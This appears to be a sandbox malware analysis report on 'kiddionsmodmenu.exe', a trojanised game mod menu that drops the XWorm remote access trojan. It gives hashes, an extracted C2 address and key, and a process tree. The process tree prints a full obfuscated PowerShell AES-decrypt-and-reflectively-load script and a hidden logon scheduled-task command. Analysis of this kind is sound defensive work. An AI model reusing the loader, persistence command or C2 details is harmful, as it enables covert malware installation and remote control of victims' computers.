Resubmissions
14-05-2024 11:22
240514-ngk71sdg28 1014-05-2024 11:22
240514-ngkw9add6y 1014-05-2024 11:22
240514-ngklgsdg27 1014-05-2024 11:22
240514-ngkaqadd6w 1014-05-2024 11:22
240514-ngjzysdd6v 1014-05-2024 11:22
240514-ngjn7add6t 1014-05-2024 11:22
240514-ngh3nadd6s 1014-05-2024 11:22
240514-ngh3nadg25 1014-05-2024 11:21
240514-nghrwsdd51 1014-05-2024 11:21
240514-ngg6csdd5z 10Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
14-05-2024 11:22
Static task
static1
Behavioral task
behavioral1
Sample
kiddionsmodmenu.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
kiddionsmodmenu.exe
Resource
win7-20240508-en
Behavioral task
behavioral3
Sample
kiddionsmodmenu.exe
Resource
win10v2004-20240426-en
General
-
Target
kiddionsmodmenu.exe
-
Size
386KB
-
MD5
88e737816cc5f3e3809152c5f9dad5be
-
SHA1
56dedf42285c74795f714dbac7782a5d0e695a97
-
SHA256
6d09d43c755d5081924748104ac487afadaf68add75d85feb2a256de032a5e2c
-
SHA512
8d29b5606f91b953263738f03188a56a4c981a6213b53a830bd1e3975ff3d10274704df2dda957fa0b73cd8841947d6e850c6046338b8ebe9666ca895ce0eebd
-
SSDEEP
12288:hFPdfNMz0ECh63X3u+DnSmMk1B+8kxkpTD:hddFMz0EH3X39DnL3PHkxgn
Malware Config
Extracted
xworm
5.0
94.156.8.167:2020
8sPZSP21r8KwS1LM
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral3/memory/1748-77-0x0000000007370000-0x000000000737E000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
flow pid Process 31 1748 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4468 powershell.exe 1424 powershell.exe 1748 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation kiddionsmodmenu.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4468 powershell.exe 4468 powershell.exe 1424 powershell.exe 1424 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4468 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeIncreaseQuotaPrivilege 1424 powershell.exe Token: SeSecurityPrivilege 1424 powershell.exe Token: SeTakeOwnershipPrivilege 1424 powershell.exe Token: SeLoadDriverPrivilege 1424 powershell.exe Token: SeSystemProfilePrivilege 1424 powershell.exe Token: SeSystemtimePrivilege 1424 powershell.exe Token: SeProfSingleProcessPrivilege 1424 powershell.exe Token: SeIncBasePriorityPrivilege 1424 powershell.exe Token: SeCreatePagefilePrivilege 1424 powershell.exe Token: SeBackupPrivilege 1424 powershell.exe Token: SeRestorePrivilege 1424 powershell.exe Token: SeShutdownPrivilege 1424 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeSystemEnvironmentPrivilege 1424 powershell.exe Token: SeRemoteShutdownPrivilege 1424 powershell.exe Token: SeUndockPrivilege 1424 powershell.exe Token: SeManageVolumePrivilege 1424 powershell.exe Token: 33 1424 powershell.exe Token: 34 1424 powershell.exe Token: 35 1424 powershell.exe Token: 36 1424 powershell.exe Token: SeIncreaseQuotaPrivilege 1424 powershell.exe Token: SeSecurityPrivilege 1424 powershell.exe Token: SeTakeOwnershipPrivilege 1424 powershell.exe Token: SeLoadDriverPrivilege 1424 powershell.exe Token: SeSystemProfilePrivilege 1424 powershell.exe Token: SeSystemtimePrivilege 1424 powershell.exe Token: SeProfSingleProcessPrivilege 1424 powershell.exe Token: SeIncBasePriorityPrivilege 1424 powershell.exe Token: SeCreatePagefilePrivilege 1424 powershell.exe Token: SeBackupPrivilege 1424 powershell.exe Token: SeRestorePrivilege 1424 powershell.exe Token: SeShutdownPrivilege 1424 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeSystemEnvironmentPrivilege 1424 powershell.exe Token: SeRemoteShutdownPrivilege 1424 powershell.exe Token: SeUndockPrivilege 1424 powershell.exe Token: SeManageVolumePrivilege 1424 powershell.exe Token: 33 1424 powershell.exe Token: 34 1424 powershell.exe Token: 35 1424 powershell.exe Token: 36 1424 powershell.exe Token: SeIncreaseQuotaPrivilege 1424 powershell.exe Token: SeSecurityPrivilege 1424 powershell.exe Token: SeTakeOwnershipPrivilege 1424 powershell.exe Token: SeLoadDriverPrivilege 1424 powershell.exe Token: SeSystemProfilePrivilege 1424 powershell.exe Token: SeSystemtimePrivilege 1424 powershell.exe Token: SeProfSingleProcessPrivilege 1424 powershell.exe Token: SeIncBasePriorityPrivilege 1424 powershell.exe Token: SeCreatePagefilePrivilege 1424 powershell.exe Token: SeBackupPrivilege 1424 powershell.exe Token: SeRestorePrivilege 1424 powershell.exe Token: SeShutdownPrivilege 1424 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeSystemEnvironmentPrivilege 1424 powershell.exe Token: SeRemoteShutdownPrivilege 1424 powershell.exe Token: SeUndockPrivilege 1424 powershell.exe Token: SeManageVolumePrivilege 1424 powershell.exe Token: 33 1424 powershell.exe Token: 34 1424 powershell.exe Token: 35 1424 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 3332 wrote to memory of 3080 3332 kiddionsmodmenu.exe 82 PID 3332 wrote to memory of 3080 3332 kiddionsmodmenu.exe 82 PID 3332 wrote to memory of 3080 3332 kiddionsmodmenu.exe 82 PID 3080 wrote to memory of 2236 3080 cmd.exe 88 PID 3080 wrote to memory of 2236 3080 cmd.exe 88 PID 3080 wrote to memory of 2236 3080 cmd.exe 88 PID 3080 wrote to memory of 4468 3080 cmd.exe 89 PID 3080 wrote to memory of 4468 3080 cmd.exe 89 PID 3080 wrote to memory of 4468 3080 cmd.exe 89 PID 4468 wrote to memory of 1424 4468 powershell.exe 94 PID 4468 wrote to memory of 1424 4468 powershell.exe 94 PID 4468 wrote to memory of 1424 4468 powershell.exe 94 PID 4468 wrote to memory of 5052 4468 powershell.exe 99 PID 4468 wrote to memory of 5052 4468 powershell.exe 99 PID 4468 wrote to memory of 5052 4468 powershell.exe 99 PID 5052 wrote to memory of 516 5052 WScript.exe 101 PID 5052 wrote to memory of 516 5052 WScript.exe 101 PID 5052 wrote to memory of 516 5052 WScript.exe 101 PID 516 wrote to memory of 1128 516 cmd.exe 103 PID 516 wrote to memory of 1128 516 cmd.exe 103 PID 516 wrote to memory of 1128 516 cmd.exe 103 PID 516 wrote to memory of 1748 516 cmd.exe 104 PID 516 wrote to memory of 1748 516 cmd.exe 104 PID 516 wrote to memory of 1748 516 cmd.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\kiddionsmodmenu.exe"C:\Users\Admin\AppData\Local\Temp\kiddionsmodmenu.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS3633.tmp\XClient_Dealed.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3080 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j9v/MRsvo8rPIZTuYpVL9r5+b1tKh4/IvXdLJbSprpc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S2gRLww5OmjzwLPcS3ad8Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcwOy=New-Object System.IO.MemoryStream(,$param_var); $TisVE=New-Object System.IO.MemoryStream; $XDooL=New-Object System.IO.Compression.GZipStream($rcwOy, [IO.Compression.CompressionMode]::Decompress); $XDooL.CopyTo($TisVE); $XDooL.Dispose(); $rcwOy.Dispose(); $TisVE.Dispose(); $TisVE.ToArray();}function execute_function($param_var,$param2_var){ $TXMac=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KbKqR=$TXMac.EntryPoint; $KbKqR.Invoke($null, $param2_var);}$IXbeQ = 'C:\Users\Admin\AppData\Local\Temp\7zS3633.tmp\XClient_Dealed.bat';$host.UI.RawUI.WindowTitle = $IXbeQ;$Ytldu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IXbeQ).Split([Environment]::NewLine);foreach ($jWeCV in $Ytldu) { if ($jWeCV.StartsWith('PpiliAyQziuRKPrYAOkn')) { $YHaeW=$jWeCV.Substring(20); break; }}$payloads_var=[string[]]$YHaeW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:2236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_599_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_599.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_599.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_599.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j9v/MRsvo8rPIZTuYpVL9r5+b1tKh4/IvXdLJbSprpc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S2gRLww5OmjzwLPcS3ad8Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rcwOy=New-Object System.IO.MemoryStream(,$param_var); $TisVE=New-Object System.IO.MemoryStream; $XDooL=New-Object System.IO.Compression.GZipStream($rcwOy, [IO.Compression.CompressionMode]::Decompress); $XDooL.CopyTo($TisVE); $XDooL.Dispose(); $rcwOy.Dispose(); $TisVE.Dispose(); $TisVE.ToArray();}function execute_function($param_var,$param2_var){ $TXMac=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KbKqR=$TXMac.EntryPoint; $KbKqR.Invoke($null, $param2_var);}$IXbeQ = 'C:\Users\Admin\AppData\Roaming\Windows_Log_599.bat';$host.UI.RawUI.WindowTitle = $IXbeQ;$Ytldu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IXbeQ).Split([Environment]::NewLine);foreach ($jWeCV in $Ytldu) { if ($jWeCV.StartsWith('PpiliAyQziuRKPrYAOkn')) { $YHaeW=$jWeCV.Substring(20); break; }}$payloads_var=[string[]]$YHaeW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:1128
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1748
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59751fcb3d8dc82d33d50eebe53abe314
SHA17a680212700a5d9f3ca67c81e0e243834387c20c
SHA256ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7
SHA51254907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709
-
Filesize
20KB
MD501b07629ceda45d11e965a5b764dd8c3
SHA106fa3b0f8b22f9a88302164c6e3e3bec4cdd0ab0
SHA2563d843614406eaf6c47b2619e56dc2062807c911e63e91bf632b002ac4884b908
SHA512fc29d4a8c002c5c50d617961962a3b678b5cd1766e83991ff4ea9dca8b4d92bc7ad04e8061ab95086059120f4623ca9b0ce691dda1ebb27db7e97dd8106ead1f
-
Filesize
152KB
MD50b426e8571f8d3e437b7a42e9b8fd808
SHA1986edba4c39be9edb552284dac555e2e95f68a4a
SHA2569c1a4e3a1c90d013a9465ab585ad7a9cfc378ebdbe77fc1548cb81c791e6914e
SHA512e2efb8ba96b4c11b6167f085d5545e7e4971850e3c57f76957b8a0b0e1896537d935d123de93c1ebfd3efab34139e9bf902911ba54f20ddffad21edeeb16b021
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
115B
MD504db1b3af0c080bbc3742361ad695df6
SHA1387088ab67cbd2e5ef40c3d06d76cbc45798c45d
SHA256c3906b5d7a241916377fa755bd0612d1d345e5347f226bf0aecec94b4a05f9c3
SHA5124993b1f4b7bb7114218a1015dd18cf8ebc8479f5498fe2de6c425a36ea058111703277f3c5b88028fea9b2d8d898bcbedd2ea1de8c12e84d123a41c37e70e190